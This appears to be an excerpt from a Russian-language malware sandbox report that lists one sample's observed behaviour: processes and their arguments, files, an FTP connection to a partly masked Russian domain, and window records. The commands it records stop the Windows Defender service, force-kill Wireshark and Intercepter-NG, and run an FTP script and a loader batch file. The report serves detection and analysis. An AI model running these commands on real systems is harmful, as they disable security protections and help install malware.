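Техническая информация
Судя по содержимому, ниже перечислены наблюдаемые действия образца: запускаемые процессы с параметрами, затрагиваемые файлы, сетевые обращения и записи об окнах (заголовки отдельных разделов в этом фрагменте отсутствуют). Для обнаружения существенны остановка службы windefend через net.exe, net1.exe и sc.exe, принудительное завершение wireshark.exe и Intercepter-NG.exe, а также запуск ftp.exe со сценарием (-s:) и обращение к порту 21.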
- '<SYSTEM32>\taskkill.exe' /IM Intercepter-NG.exe /F
- '<SYSTEM32>\net1.exe' start schedule
- '<SYSTEM32>\ftp.exe' -s:"%PROGRAM_FILES%\load.txt"
- '<SYSTEM32>\taskkill.exe' /IM wireshark.exe /F
- '<SYSTEM32>\net.exe' stop windefend
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\loader.bat" "
- '<SYSTEM32>\sc.exe' stop windefend
- '<SYSTEM32>\net1.exe' stop windefend
- %PROGRAM_FILES%\load.txt
- %TEMP%\1.tmp\loader.bat
- %PROGRAM_FILES%\load.txt
- 'an##psy.ru':21
- 'localhost':1036
- DNS ASK an##psy.ru
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: '(null)' WindowName: '(null)'